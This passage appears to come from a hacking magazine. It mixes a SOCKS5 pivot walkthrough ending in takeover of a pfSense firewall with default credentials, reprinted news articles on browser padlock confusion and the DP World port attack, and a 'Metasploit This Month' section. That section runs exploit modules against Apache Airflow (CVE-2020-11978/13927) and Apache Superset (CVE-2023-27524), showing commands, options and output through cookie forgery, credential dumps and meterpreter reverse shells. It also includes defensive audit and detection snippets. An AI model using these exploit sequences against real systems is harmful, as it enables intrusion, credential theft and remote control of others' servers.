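    atyp = req[3]
    if atyp == ATYP_IPV4:
        host, rest = str(IPv4Address(req[4:8])), req[8:]
    elif atyp == ATYP_DOMAIN:
        n = req[4]
        host, rest = req[5:5 + n].decode("idna"), req[5 + n:]
    else:
        raise ValueError("unsupported ATYP")
    (port,) = struct.unpack("!H", rest[:2])
    return host, port


def server_reply(rep: int, bind_host: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT"""
    return (bytes([SOCKS_VERSION, rep, 0x00, ATYP_IPV4]) + IPv4Address(bind_host).packed
            + struct.pack("!H", bind_port))


def parse_reply(reply: bytes) -> str:
    if reply[0] != SOCKS_VERSION:
        raise ValueError("not SOCKS5")
    return REPLY_TEXT.get(reply[1], f"unknown reply {reply[1]}")


def looks_like_socks5_greeting(first_bytes: bytes) -> bool:
    """Signature for the first payload of a TCP flow: 0x05, a method count of 1..255,
    and exactly that many method bytes.  Cheap to apply on any port."""
    return (len(first_bytes) >= 3 and first_bytes[0] == SOCKS_VERSION
            and 1 <= first_bytes[1] <= 255 and len(first_bytes) == 2 + first_bytes[1])


def handshake_transcript(dest_host: str, dest_port: int) -> List[tuple]:
    """Replay the exchange the browser in the article performs against 127.0.0.1:1080."""
    c1 = client_greeting()
    s1 = server_method_choice(c1)
    c2 = connect_request(dest_host, dest_port)
    host, port = parse_connect_request(c2)
    s2 = server_reply(0)                     # the proxy reports success
    return [("client", c1), ("server", s1), ("client", c2), ("server", s2),
            ("proxy connects to", (host, port)), ("status", parse_reply(s2))]


if __name__ == "__main__":
    for who, msg in handshake_transcript("192.168.223.3", 80):
        print(f"{who:>18}: {msg.hex() if isinstance(msg, bytes) else msg}")
```

Because the greeting carries no authentication when USERNAME and PASSWORD are left unset (as in the module options above), anything that can reach the listener can use the pivot; that is the reason to watch for the 05 01 00 greeting on unexpected ports and to require SOCKS5 authentication on any proxy you operate yourself.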

Network Settings
Configure how Firefox connects to the internet.  [Settings...]

Connection Settings

Configure Proxy Access to the Internet
( ) No proxy
( ) Auto-detect proxy settings for this network
( ) Use system proxy settings
(•) Manual proxy configuration

    HTTP Proxy                                   Port  0
    [ ] Also use this proxy for HTTPS
    HTTPS Proxy                                  Port  0
    SOCKS Host  127.0.0.1                        Port  1080
    ( ) SOCKS v4   (•) SOCKS v5
    Automatic proxy configuration URL            [Reload]
    No proxy for

    [Help]                          [Cancel]  [OK]

In some instances, the QNAPCrypt ransomware group, which focuses on Network Attached Storage (NAS) devices, exploited authentication methods to establish a SOCKS5 proxy connection.

Now, when I type the IP address "192.168.223.3" in the browser, I can see the interface of the Firewall. Remember that this Firewall belongs to the target network and we can easily log in since we already know the credentials.

[Browser screenshot: http://192.168.223.3 - "Login to pfSense" page, SIGN IN form with Username "admin"]

[Browser screenshot: pfSense web interface after login - System, VPN, Status, Diagnostics, Help menu]

WARNING: The admin account password is set to the default value. Change the password in the User Manager.

    Name               pfSense.home.arpa
    User               admin@192.168.223.6 (Local Database)
    System             VMware Virtual Machine
                       Netgate Device ID: 2c1a85168b1c5538fa80
    BIOS               Vendor: Phoenix Technologies LTD
                       Version: 6.00
                       Release Date: Wed Jul 22 2020
    Version            2.7.0-RELEASE (amd64)
                       built on Wed Jun 28 03:53:34 UTC 2023
                       FreeBSD 14.0-CURRENT
                       Version information updated at Mon Dec 4 8:55:38 UTC 2023
    CPU Type           Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz
                       AES-NI CPU Crypto: Yes (inactive)
                       QAT Crypto: No

Netgate Services And Support
    Contract type: Community Support
    If you purchased your pfSense gateway firewall appliance from Netgate and elected Community Support at the point of sale or installed pfSense on your own hardware, you have access to various community support resources. This includes the NETGATE RESOURCE LIBRARY.
    You also may upgrade to a Netgate Global Technical Assistance Center (TAC) Support subscription. We're always on! Our team is staffed 24x7x365 and committed to delivering enterprise class worldwide support at a price point that is more than competitive when compared to others in our space.
    - Upgrade Your Support   - Community Support Resources
    - Netgate Global Support FAQ   - Official pfSense Training by Netgate

Voila, Login successful. We now own the Firewall too.

[Network diagram]
Company's Network Firewall: External IP 192.168.249.160, Internal IP 192.168.223.3
Attacker's Network Firewall: External IP 192.168.249.159, Internal IP 192.168.110.1
Internet (between the two firewalls)
Attacker System: IP 192.168.110.5
Target system: IP Address 192.168.223.6
We have successfully performed Lateral Movement too. Now, we can set any rules we want and do whatever we want to do. But for now, let's just view the rule that exposed Windows XP to the internet.

[Screenshot: the pfSense Firewall / NAT page in the Kali browser, showing the port forward entry and its linked firewall rule.]

The vast majority of us have no idea what the padlock icon on our internet browser is - and it's putting us at risk

CYBER SECURITY

Fiona Carroll
Reader in Human Computer Interaction, Cardiff Metropolitan University

Do you know what the padlock symbol in your internet browser's address bar means? If not, you're not alone. New research by my colleagues and I shows that only 5% of UK adults understand the padlock's significance. This is a threat to our online safety.

The padlock symbol on a web browser simply means that the data being sent between the web server and the user's computer is encrypted and cannot be read by others. But when we asked people what they thought it meant, we received an array of incorrect answers.

In our study, we asked a cross section of 528 web users, aged between 18 and 86 years of age, a number of questions about the internet. Some [...] had a bachelor's degree or above and 22% had a college certificate, while the remainder had no further education.

One of our questions was: "On the Google Chrome browser bar, do you know what the padlock icon represents/means?"

Of the 463 who responded, 63% stated they knew, or thought they knew, what the padlock symbol on their web browser meant, but only 7% gave the correct meaning. Respondents gave us a range of incorrect interpretations, believing among other things that the padlock signified a secure web page or that the website is safe and doesn't contain any viruses or suspicious links. Others believed the symbol means a website is "trustworthy", is not harmful, or is a "genuine" website.

(Cont'd on next page)

Not understanding symbols like the padlock icon can pose problems to internet users. These include increased security risks and simply hindering effective use of the technology.

Our findings corroborate research by Google itself, who in September replaced the padlock icon with a neutral symbol described as a "tune icon". In doing so, Google hopes to eradicate the misunderstandings that the padlock icon has afforded.

However, Google's update now raises the question as to whether other web browser companies will join forces to ensure their designs are uniform and intuitive across all platforms.

Web browser evolution

Without a doubt, the browser, which is our point of entry to the world wide web, comes with a lot of responsibility on the part of web companies. It's how we now view web pages, so the browser has become an integral part of our daily lives.

It's intriguing to look back and trace the evolution of the web's design from the early 1990s to where we are today. Creating software that people wanted to use and found effective was at the heart of this evolution. The creation of functioning, satisfying, and most importantly, consistently designed user interfaces was an important goal in the 1990s. In fact, there was a drive in those early days to create web interface designs that were so consistent and intuitive that users would not need to think too much about how they work.

Nowadays, it's a different story because the challenge is centred on helping people to think before they interact online. In light of this, it seems bizarre that the design of the web browser in 2023 still affords uncertainty through its design. Worse still, that it is inconsistently presented across its different providers.

It could be argued that this stems from the browser wars of the mid-1990s. That's when the likes of Microsoft and former software company, Netscape, tried to outdo each other with faster, better and more unique products. The race to be distinct meant there was inconsistency between products.

Internet Safety

However, introducing distinct browser designs can lead to user confusion, misunderstanding and a false sense of security, especially when it is now widely known that such inconsistency can breed confusion, and from that, frustration and lack of use.

As an expert in human-computer interaction, it is alarming to me that some browser companies continue to disregard established guidelines for usability. In a world where web browsers open the doors to potentially greater societal risks than the offline world, it is crucial to establish a consistent approach for addressing these dangers.

As a minimum, we need web browser companies to join forces in a concerted effort to shield users, or at the very least, heighten their awareness regarding potential online risks. This should include formulating one unified design across the board that affords an enriched and safe user experience.

"As an expert in human-computer interaction, it is alarming to me that web browser companies continue to disregard established guidelines for usability."

This Article first appeared in The Conversation
Starting from January 1 2024, Hackercool Magazine will be leaving Youtube, as most of the videos we are posting are becoming victims of "content violation" (obviously). We are finding it difficult to maintain the standard of videos and adhere to Youtube's content policies.

Hackercool Magazine will also be leaving Pinterest starting from the same date mentioned above. If you are following us on any of the above social media channels, we request you to shift to our other social media channels.

Latest Apache Modules

METASPLOIT THIS MONTH

After a long time, welcome back to Metasploit This Month. Let us learn about the latest exploit modules of Metasploit and how they fare in our tests.

Apache Airflow RCE Module

TARGET: Apache Airflow < 1.10.11    TYPE: Remote
MODULE: Exploit    ANTI-MALWARE: NA
CVE-ID: CVE-2020-11978 + CVE-2020-13927

Apache Airflow is an open-source tool that is used for orchestration of data pipelines or workflows. Workflows and data pipelines are useful in creating visualizations of sales numbers of the previous day, for example. It is used by Adobe, Adyen, Snapp etc.

The above-mentioned versions of Apache Airflow have an unauthenticated command injection vulnerability. This vulnerability is a result of two critical vulnerabilities. The first one is CVE-2020-11978, which is an authenticated command injection vulnerability in the "example_trigger_target_dag". The second one is CVE-2020-13927, which is the default setting of Airflow 1.10.10 that allows unauthenticated access to the Airflow Experimental REST API. This REST API allows anyone to perform malicious actions like triggering the vulnerable DAG above.

Combining these two vulnerabilities, attackers can perform remote code execution. Let's see how this module works. We have tested this on Apache Airflow 1.10.10 running as a docker container. The compose file of this can be downloaded from the link given in our Downloads section. Let's set the target first. Start the container.
┌──(kali㉿212d)-[~/airflow]
└─$ docker-compose up
Creating network "airflow_default" with the default driver
Pulling x-airflow-common (apache/airflow:1.10.10)...
1.10.10: Pulling from apache/airflow

airflow-webserver_1 | [2023-11-26 07:16:37,825] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
airflow-webserver_1 | [2023-11-26 07:16:38,025] {__init__.py:51} INFO - Using executor SequentialExecutor
airflow-webserver_1 | [2023-11-26 07:16:38,027] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
airflow-webserver_1 | [2023-11-26 07:16:38,030] {__init__.py:51} INFO - Using executor SequentialExecutor
airflow-webserver_1 | [2023-11-26 07:16:38,032] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
airflow-webserver_1 | [2023-11-26 07:16:38,041] {__init__.py:51} INFO - Using executor SequentialExecutor
airflow-webserver_1 | [2023-11-26 07:16:38,043] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
airflow-webserver_1 | 127.0.0.1 - - [26/Nov/2023:07:16:41 +0000] "GET /health HTTP/1.1" 200 187 "curl/7.64.0"
airflow-webserver_1 | 127.0.0.1 - - [26/Nov/2023:07:16:51 +0000] "GET /health HTTP/1.1" 200 187 "curl/7.64.0"

The target is ready. Now, load the Apache_Airflow_RCE module.

"The importance of epistemic security and cybersecurity is now comparable to that of national security" - Roger Spitz
msf6 > search airflow

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/linux/http/apache_airflow_dag_rce  2020-07-14       excellent  Yes    Apache Airflow 1.10.10 - Example DAG Remote Code Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/apache_airflow_dag_rce

msf6 > use 0
[*] Using configured payload cmd/unix/python/meterpreter_reverse_tcp
msf6 exploit(linux/http/apache_airflow_dag_rce) > show options

Module options (exploit/linux/http/apache_airflow_dag_rce):

   Name       Current Setting                                    Required  Description
   ----       ---------------                                    --------  -----------
   DAG_PATH   /api/experimental/dags/example_trigger_target_dag  yes       Path to vulnerable example DAG
   Proxies                                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080                                               yes       Apache Airflow webserver default port (TCP)
   SSL        false                                              no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                                                     yes       Base path
   TIMEOUT    120                                                yes       How long to wait for payload execution (seconds)
   VHOST                                                         no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command
Set all the required options and see if the target is indeed vulnerable.
msf6 exploit(linux/http/apache_airflow_dag_rce) > set rhosts 192.168.16.2
rhosts => 192.168.16.2
msf6 exploit(linux/http/apache_airflow_dag_rce) > check
[*] 192.168.16.2:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/apache_airflow_dag_rce) >

The target is indeed vulnerable. After setting all the options, execute the module.
msf6 exploit(linux/http/apache_airflow_dag_rce) > set lhost 192.168.16.1
lhost => 192.168.16.1
msf6 exploit(linux/http/apache_airflow_dag_rce) > run

[*] Started reverse TCP handler on 192.168.16.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing TARGET: "Unix Command" with PAYLOAD: "cmd/unix/python/meterpreter_reverse_tcp"
[+] Successfully created DAG: Created <DagRun example_trigger_target_dag @ 2023-11-26 07:19:36+00:00: manual__2023-11-26T07:19:36+00:00, externally triggered: True>
[*] Waiting for Scheduler to run the vulnerable DAG. This might take a while...
[!] Bash task is not yet queued...
[!] Bash task is not yet queued...
[!] Bash task is not yet queued...
[!] Bash task is not yet queued...
[*] Bash task is queued...
[+] Bash task is running. Expect a session if executed successfully.
[-] Meterpreter session 1 is not valid and will be closed
[*] 192.168.16.2 - Meterpreter session 1 closed.
[*] Meterpreter session 2 opened (192.168.16.1:4444 -> 192.168.16.2:47086) at 2023-11-26 02:21:09 -0500

meterpreter > getuid
Server username: airflow
meterpreter > sysinfo
Computer        : ab8202388742
OS              : Linux 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12)
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >

As readers can see, we have a successful meterpreter session on the target.
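The two settings this module chains (the open experimental API of CVE-2020-13927 and the example DAGs of CVE-2020-11978) are both visible in airflow.cfg, so a defender can check them before a scanner does. The audit below is an added example for this article, not Airflow's or Metasploit's code; the config texts are constructed, while the option names and the AIRFLOW__SECTION__KEY environment override are Airflow's real ones.

```python
"""Audit an airflow.cfg (plus environment overrides) for the two settings
behind CVE-2020-13927 and CVE-2020-11978. Added example; not Airflow code."""
import configparser
from typing import Dict, List, Optional

# Constructed excerpt reproducing the Airflow 1.10.10 defaults the exploit relies on.
VULNERABLE_CFG = """
[core]
dags_folder = /opt/airflow/dags
load_examples = True

[api]
auth_backend = airflow.api.auth.backend.default
"""

# Same file with the API locked down (the 1.10.11 default) and example DAGs disabled.
HARDENED_CFG = """
[core]
dags_folder = /opt/airflow/dags
load_examples = False

[api]
auth_backend = airflow.api.auth.backend.deny_all
"""

# The 1.10.10 default backend accepts every request on the experimental REST API.
OPEN_API_BACKENDS = {"airflow.api.auth.backend.default"}


def _setting(cfg: configparser.ConfigParser, env: Dict[str, str],
             section: str, key: str, default: str) -> str:
    """AIRFLOW__<SECTION>__<KEY> in the environment wins over the file, as in Airflow."""
    return env.get(f"AIRFLOW__{section.upper()}__{key.upper()}",
                   cfg.get(section, key, fallback=default))


def _as_bool(value: str) -> bool:
    return value.strip().lower() in ("1", "true", "t", "yes", "y")


def audit_airflow_cfg(text: str, env: Optional[Dict[str, str]] = None) -> List[str]:
    """Return one finding per weak setting; an empty list means both are hardened.
    Missing options are judged by the 1.10.10 defaults, which are the weak values."""
    env = env or {}
    cfg = configparser.ConfigParser(interpolation=None)  # airflow.cfg uses %% escapes
    cfg.read_string(text)
    findings: List[str] = []

    backend = _setting(cfg, env, "api", "auth_backend", "airflow.api.auth.backend.default")
    if backend in OPEN_API_BACKENDS:
        findings.append(f"[api] auth_backend = {backend}: experimental REST API is "
                        "unauthenticated (CVE-2020-13927); set airflow.api.auth.backend.deny_all")

    if _as_bool(_setting(cfg, env, "core", "load_examples", "True")):
        findings.append("[core] load_examples = True: example DAGs such as "
                        "example_trigger_target_dag are loaded (CVE-2020-11978); set False")
    return findings


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_CFG), ("hardened", HARDENED_CFG)):
        print(f"{name}: {audit_airflow_cfg(text) or 'no findings'}")
    # A container started with env overrides is judged by the overrides, not the file.
    overrides = {"AIRFLOW__API__AUTH_BACKEND": "airflow.api.auth.backend.deny_all",
                 "AIRFLOW__CORE__LOAD_EXAMPLES": "False"}
    print("vulnerable file + env overrides:",
          audit_airflow_cfg(VULNERABLE_CFG, overrides) or "no findings")
```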

Apache Superset Privesc Module

TARGET: Apache Superset <= 2.0.0    TYPE: Remote
MODULE: Auxiliary    ANTI-MALWARE: NA
CVE-ID: CVE-2023-27524

Apache Superset is an open-source software application that is used for data exploration and data visualization. The above-mentioned versions of the software use Flask with a known default secret key that is used to sign HTTP cookies.

These cookies, however, can easily be forged. An attacker can log in to the site, decode its cookie, set their user-id to that of an administrator and re-sign the cookie. This cookie, which now becomes a valid cookie, can then be used to log in as the targeted user and retrieve database credentials saved in Apache Superset.
Let's see how this module works. We have tested this on Apache Superset 2.0.0 installed as a Docker container. Let's set the target first.

$ sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
sudo: unable to resolve host 212d: Name or service not known
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Unable to find image 'apache/superset:2.0.0' locally

Once the docker image is created, create a user named "admin".

$ sudo docker exec -it superset superset fab create-admin \
    --username admin \
    --firstname Superset \
    --lastname Admin \
    --email admin@superset.com \
    --password admin

2023-11-25 06:50:53,510:WARNING:superset.utils.cache_manager:Falling back to the built-in cache, that stores data in the metadata database, for the following cache: 'FILTER_STATE_CACHE_CONFIG'. It is recommended to use 'RedisCache', 'MemcachedCache' or another dedicated caching backend for production deployments
Falling back to the built-in cache, that stores data in the metadata database, for the following cache: 'EXPLORE_FORM_DATA_CACHE_CONFIG'. It is recommended to use 'RedisCache', 'MemcachedCache' or another dedicated caching backend for production deployments
2023-11-25 06:50:53,519:WARNING:superset.utils.cache_manager:Falling back to the built-in cache, that stores data in the metadata database, for the following cache: 'EXPLORE_FORM_DATA_CACHE_CONFIG'. It is recommended to use 'RedisCache', 'MemcachedCache' or another dedicated caching backend for production deployments
Create a database.

┌──(kali㉿212d)-[~]
└─$ sudo docker exec -it superset superset db upgrade
sudo: unable to resolve host 212d: Name or service not known

--------------------------------------------------------------------------------
                                    WARNING
--------------------------------------------------------------------------------
A Default SECRET_KEY was detected, please use superset_config.py to override it.
Use a strong complex alphanumeric string and use a tool to help you generate
a sufficiently random sequence, ex: openssl rand -base64 42
--------------------------------------------------------------------------------

2023-11-25 06:51:50,336:INFO:superset.utils.logging_configurator:logging was configured successfully

... -> ad07e4fdbaba, rm_time_range_endpoints_from_qc_3
slices updated with no time_range_endpoints: 0
INFO  [alembic.runtime.migration] Running upgrade ad07e4fdbaba -> a9422eeaae74, new dataset models take 2
>> Assign new UUIDs to tables...
>> Drop intermediate columns...
INFO  [alembic.runtime.migration] Running upgrade a9422eeaae74 -> cbe71abde154, fix report schedule and execution log
INFO  [alembic.runtime.migration] Running upgrade cbe71abde154 -> 6f139c533bea, adding_advanced_data_type.py
Revision ID: 6f139c533bea
Revises: cbe71abde154
Create Date: 2021-05-27 16:10:59.567684
INFO  [alembic.runtime.migration] Running upgrade 6f139c533bea -> e786798587de, Delete None permissions
INFO  [alembic.runtime.migration] Running upgrade e786798587de -> e09b4ae78457, Resize key_value blob


┌──(kali㉿212d)-[~]
└─$ sudo docker exec superset superset init
sudo: unable to resolve host 212d: Name or service not known

2023-11-25 06:53:11,864:INFO:superset.security.manager:Syncing granter perms
Syncing sql lab perms
2023-11-25 06:53:12,335:INFO:superset.security.manager:Syncing sql lab perms
Fetching a set of all perms to lookup which ones are missing
2023-11-25 06:53:12,874:INFO:superset.security.manager:Fetching a set of all perms to lookup which ones are missing
Creating missing datasource permissions.
2023-11-25 06:53:13,014:INFO:superset.security.manager:Creating missing datasource permissions.
Creating missing database permissions.
2023-11-25 06:53:13,021:INFO:superset.security.manager:Creating missing database permissions.
Cleaning faulty perms
2023-11-25 06:53:13,029:INFO:superset.security.manager:Cleaning faulty perms

┌──(kali㉿212d)-[~]
└─$

The target is ready. Load the auxiliary/gather/apache_superset_cookie_sig_priv_esc module and set the required options.
msf6 > search superset

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/gather/apache_superset_cookie_sig_priv_esc  2023-04-25       normal  Yes    Apache Superset Signed Cookie Priv Esc
   1  exploit/linux/http/apache_superset_cookie_sig_rce     2023-09-06       good    Yes    Apache Superset Signed Cookie RCE
   2  auxiliary/analyze/crack_webapps                                        normal  No     Password Cracker: Webapps

Interact with a module by name or index. For example info 2, use 2 or use auxiliary/analyze/crack_webapps

"Security used to be an inconvenience sometimes, but now it's a necessity all the time."
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > check

[-] Msf::OptionValidateError The following options failed to validate: USERNAME, PASSWORD
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set username admin
username => admin
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set password admi
password => admi
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > set password admin
password => admin
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > check
[+] 172.17.0.2:8088 - The target appears to be vulnerable. Apache Supset 2.0.0 is vulnerable
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) >

After all the options are set, execute the module.
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) > run
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache Supset 2.0.0 is vulnerable
[*] 172.17.0.2:8088 - Initial Cookie: session=<unauthenticated session cookie>;
[*] 172.17.0.2:8088 - Decoded Cookie: {"csrf_token"=>"a5127514809d8d683453e45c4e7b4499f7709b0e", "locale"=>"en"}
[*] 172.17.0.2:8088 - Attempting login
[+] 172.17.0.2:8088 - Logged in Cookie: session=<authenticated session cookie>;
[+] 172.17.0.2:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 172.17.0.2:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"<128-character hex session id>", "csrf_token"=>"a5127514809d8d683453e45c4e7b4499f7709b0e", "locale"=>"en", "user_id"=>1}
[*] 172.17.0.2:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 172.17.0.2:8088 - New signed cookie: <re-signed session cookie>
[+] 172.17.0.2:8088 - Cookie validated to user: admin
[*] Done enumerating databases
[*] Auxiliary module execution completed
msf6 auxiliary(gather/apache_superset_cookie_sig_priv_esc) >

"I think computer viruses should count as life. I think it says something about human nature that the only form of life we have created so far is purely destructive. We've created life in our own image."
- Stephen Hawking

As readers can see, the databases have been successfully retrieved.

Apache Superset Sig RCE Module

TARGET: Apache Superset <= 2.0.0    TYPE: Remote
MODULE: Exploit    ANTI-MALWARE: NA

This module exploits the same vulnerability of Apache Superset explained above but gets a meterpreter session at the end. Let's see how this module works. The target is the same as above.
msf6 > search apache superset

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/gather/apache_superset_cookie_sig_priv_esc  2023-04-25       normal  Yes    Apache Superset Signed Cookie Priv Esc
   1  exploit/linux/http/apache_superset_cookie_sig_rce     2023-09-06       good    Yes    Apache Superset Signed Cookie RCE

Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/http/apache_superset_cookie_sig_rce

msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > show options

Module options (exploit/linux/http/apache_superset_cookie_sig_rce):

   Name              Current Setting                                                            Required  Description
   ----              ---------------                                                            --------  -----------
   ADMIN_ID          1                                                                          yes       The ID of an admin account
   DATABASE          /app/superset_home/superset.db                                             yes       The superset database location
   PASSWORD                                                                                     yes       The password for the specified username
   Proxies                                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             8088                                                                       yes       The target port (TCP)
   SECRET_KEYS_FILE  /usr/share/metasploit-framework/data/wordlists/superset_secret_keys.txt    no        File containing secret keys to try, one per line
   SSL               false                                                                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                                                                                    yes       Relative URI of Apache Superset installation
   USERNAME                                                                                     yes       The username to authenticate as
   VHOST                                                                                        no        HTTP server virtual host

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

"You know something is wrong when the government declares opening someone else's mail is a felony but your internet activity is fair game for data collecting"
- E.A. Bucchianeri

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set rhosts 172.17.0.2
rhosts => 172.17.0.2
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > check

[-] Msf::OptionValidateError The following options failed to validate: USERNAME, PASSWORD
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set username admin
username => admin
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set password admin
password => admin
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > check
[*] 172.17.0.2:8088 - The target appears to be vulnerable. Apache Supset 2.0.0 is vulnerable
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) >

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 172.17.0.2:8088 - Attempting login
[+] 172.17.0.2:8088 - Logged in Cookie: session=<authenticated session cookie>;
[+] 172.17.0.2:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 172.17.0.2:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"2631
[*] 172.17.0.2:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 172.17.0.2:8088 - New signed cookie: <re-signed session cookie>
[+] 172.17.0.2:8088 - Cookie validated to user: admin
[+] Successfully created db mapping with id: 1
[+] Using tab: 1

[+] Superset Creds

 Username  Password
 --------  --------
 admin     $pbkdf2-sha256$260000$<salt>$<hash>

[+] New Dashboard id: 1
[+] Dashboard permalink key: zDjqJyaJBvx
[*] Triggering payload
[*] Sending stage (24772 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38574) at 2023-11-25 01:59:50 -0500
[*] Unsetting RCE Payloads
[*] Deleting dashboard
[*] Deleting sqllab tab
[*] Deleting database mapping

meterpreter >
meterpreter > syyysinfo
[-] Unknown command: syyysinfo
meterpreter > sysinfo
Computer        : 45f5ce6fda7f
OS              : Linux 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12)
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > getuid
Server username: superset
meterpreter >

As readers can see, we successfully got a meterpreter session on the target system.
Major cyberattack on Australian ports suggests sabotage by a 'foreign state actor'

CYBER WAR

David Tuffley
Senior Lecturer in Applied Ethics & Cyber Security, Griffith University

A serious cyberattack has disrupted operations at several of Australia's largest ports, causing delays and congestion. Late on Friday, port operator DP World detected an IT breach that affected critical systems used to coordinate shipping activity.

DP World is one of Australia's largest port operators, handling approximately 40% of the nation's container trade across terminals in Brisbane, Sydney, Melbourne and Fremantle.

DP World reacted quickly to contain the breach, including shutting down access to their port networks on land, to prevent further unauthorised access. This means they essentially "pulled the plug" on their internet connection to limit possible further harm.

DP World senior director Blake Tierney said it is still possible to unload containers from ships, but the trucks that transport the containers cannot drive in or out of the terminals. This is a precaution when the full extent of a data breach is not known.

The latest media reports suggest cargo could be stranded at the ports for several days. Australian Federal Police and the Australian Cyber Security Centre are investigating the source and nature of the attack, deemed a "nationally significant incident" by federal cybersecurity coordinator Darren Goldie.

Is there evidence of this being a malicious attack?

The timing, scale and impact of the disruption do suggest this was a targeted attack.

It occurred on a Friday night, when most staff were off duty and less likely to notice or respond to the incident. The target was a major port operator that handles a significant share of Australia's trade and commerce. Such an attack can have serious consequences for Australia's economy, security and sovereignty.

The identity and motive of the attackers are not yet known, but the skills needed to mount such an attack suggest a foreign state actor trying to undermine Australia's national security or economic interests.

(Cont'd on next page)

In recent years, cyberattacks on ports and shipping have become more common. For instance, in February 2022, several European ports were hit by a cyberattack that disrupted oil terminals. In another incident early this year, a ransomware attack on maritime software impacted more than 1,000 ships. Also in January 2023, the Port of Lisbon was targeted by a ransomware attack which threatened the release of port data.

These incidents highlight the vulnerability of the maritime industry to cyber threats and the need for increased cybersecurity measures.

How might the attack have happened?

So far, the details have not been disclosed. But based on what we know about similar cases, it is possible the attack took advantage of vulnerabilities in DP World's systems. These vulnerabilities are normally closed by applying a "patch" in the same way your browser needs updating every week or two to keep it safe from being hacked.

Once hackers gained access, the breach likely pivoted to infiltrate the operational systems that directly manage port activities. Failing to isolate and secure these control networks allowed the incident to impact operations.

It is also possible access was gained via a phishing email or a malicious link. Such an attack may have tricked an employee or a contractor into opening an attachment or clicking on a link that installed malware or ransomware on the network.

Now what?

DP World is working urgently to rebuild affected systems from backups. However, resetting port management networks is a complicated process that could take days or weeks. Until the operator's core systems are securely restored, cargo flows may face ongoing delays.

The Australian government is closely involved in managing the situation, providing support and advice to DP World and other affected parties through the Critical Infrastructure Centre and the Trusted Information Sharing Network. These government agencies are equipped to provide timely support in times of crisis.

How can we prevent future attacks?

The DP World cyberattack is a clear warning of the risks to the essential transportation services that power Australia's trade and commerce.

Ports are difficult targets. To cause such a disruption, the attackers would have to be highly skilled and plan ahead. The fact ports have been successfully hacked more than once in recent times suggests threats from cybercriminals are steadily increasing.

For companies such as DP World, it's important to continuously monitor networks in real time, promptly install security [...] from each other.

Dedicated, well-resourced cybersecurity personnel, employee training and incident response plans are key to improving preparedness.

